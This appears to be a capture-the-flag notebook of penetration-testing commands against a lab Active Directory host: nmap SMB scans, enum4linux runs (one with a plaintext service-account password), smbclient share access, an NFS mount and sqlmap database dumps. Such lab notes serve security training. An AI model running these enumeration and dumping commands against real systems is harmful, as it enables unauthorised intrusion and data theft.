# Service Enumeration:

In [1]:
%env TARGET=10.10.133.181

env: TARGET=10.10.133.181


# SMB:

In [2]:
!nmap -v -sV --open -Pn  -p 137,139,445 --script=smb-ls $TARGET

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-05 02:37 UTC
NSE: Loaded 46 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 02:37
Completed NSE at 02:37, 0.00s elapsed
Initiating NSE at 02:37
Completed NSE at 02:37, 0.00s elapsed
Initiating ARP Ping Scan at 02:37
Scanning 10.10.133.181 [1 port]
Completed ARP Ping Scan at 02:37, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 02:37
Completed Parallel DNS resolution of 1 host. at 02:37, 0.00s elapsed
Initiating SYN Stealth Scan at 02:37
Scanning ip-10-10-133-181.eu-west-1.compute.internal (10.10.133.181) [3 ports]
Discovered open port 139/tcp on 10.10.133.181
Discovered open port 445/tcp on 10.10.133.181
Completed SYN Stealth Scan at 02:37, 0.04s elapsed (3 total ports)
Initiating Service scan at 02:37
Scanning 2 services on ip-10-10-133-181.eu-west-1.compute.internal (10.10.133.181)
Complete

In [3]:
!nmap -v -sV --open -Pn  -p 137,139,445 --script=smb-os-discovery,smb-enum-shares,smb-security-mode $TARGET --script-args=smbbasic=1,smbsign=ignore | tee smb_results.txt

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-05 02:37 UTC
NSE: Loaded 48 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 02:37
Completed NSE at 02:37, 0.00s elapsed
Initiating NSE at 02:37
Completed NSE at 02:37, 0.00s elapsed
Initiating ARP Ping Scan at 02:37
Scanning 10.10.133.181 [1 port]
Completed ARP Ping Scan at 02:37, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 02:37
Completed Parallel DNS resolution of 1 host. at 02:37, 0.00s elapsed
Initiating SYN Stealth Scan at 02:37
Scanning ip-10-10-133-181.eu-west-1.compute.internal (10.10.133.181) [3 ports]
Discovered open port 445/tcp on 10.10.133.181
Discovered open port 139/tcp on 10.10.133.181
Completed SYN Stealth Scan at 02:37, 0.04s elapsed (3 total ports)
Initiating Service scan at 02:37
Scanning 2 services on ip-10-10-133-181.eu-west-1.compute.internal (10.10.133.181)
Complete

In [4]:
import os

try:
    result = !cat smb_results.txt | grep account_used

    anon_user = result[0].split(':')[-1].strip()
except:
    anon_user = "guest"

anon_user

'guest'

In [10]:
!./enum4linux.pl -a -u {anon_user} {os.environ['TARGET']}

Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Oct  5 02:38:49 2021

 =========================================( Target Information )=========================================

Target ........... 10.10.133.181
RID Range ........ 500-550,1000-1050
Username ......... 'guest'
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ===========================( Enumerating Workgroup/Domain on 10.10.133.181 )===========================


[+] Got domain/workgroup name: THM-AD


 ===============================( Nbtstat Information for 10.10.133.181 )===============================

Looking up status of 10.10.133.181
	ATTACKTIVEDIREC <00> -         B <ACTIVE>  Workstation Service
	THM-AD          <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
	THM-AD          <1c> - <GROUP> B <ACTIVE>  Domain Controllers
	THM-AD          <1b> -         B <ACTIVE>  Domain Master Browser
	ATTACKTIVEDIREC <20> -         

In [14]:
!./enum4linux.pl $TARGET -u svc-admin -p management2005

Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Oct  5 03:44:43 2021

 =========================================( Target Information )=========================================

Target ........... 10.10.133.181
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ===========================( Enumerating Workgroup/Domain on 10.10.133.181 )===========================


[+] Got domain/workgroup name: THM-AD


 ===============================( Nbtstat Information for 10.10.133.181 )===============================

Looking up status of 10.10.133.181
	ATTACKTIVEDIREC <00> -         B <ACTIVE>  Workstation Service
	THM-AD          <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
	THM-AD          <1c> - <GROUP> B <ACTIVE>  Domain Controllers
	THM-AD          <1b> -         B <ACTIVE>  Domain Master Browser
	ATTACKTIVEDIREC <20> -         B <AC

In [15]:
!smbclient -L 10.10.133.181 -U svc-admin

Enter WORKGROUP\svc-admin's password: 

In [7]:
%env SHARE=Users

env: SHARE=Users


In [8]:
!echo Run this:
!echo cd \'$(pwd)\'
!echo smbclient //$TARGET/$SHARE -U guest

Run this:
cd '/workspace/ctf-notebooks'
smbclient //10.10.133.181/Users -U guest


In [9]:
from web_footprinting_utils import show_term

show_term()

TypeError: show_term() missing 1 required positional argument: 'ip'

#### Use ls, get, cd to pull down any needed files in SMB...

In [ ]:
!ls

In [ ]:
!cat log.txt

# NFS Anonymous Mounting:

In [ ]:
from getpass import getpass
import os

%env RDIR = /var

In [ ]:
# !mkdir -p my_mount
# !echo { getpass() } | sudo -S sudo mount {os.environ['TARGET']}:{os.environ['RDIR']} my_mount
# !ls -la my_mount

# SQL Map:

In [ ]:
!sqlmap -r bugle_user.txt --dbms=mariadb --dump --batch

In [ ]:
!sqlmap -r bugle_admin.txt --dbms=mariadb --dump --batch

In [ ]:
!sqlmap -r bugle_admin.txt --dbms=mariadb --dump --batch --level=5

# FTP:

ftp 10.10.28.39

anonymous

no password

#### remember to enable binary mode to download binaries:

binary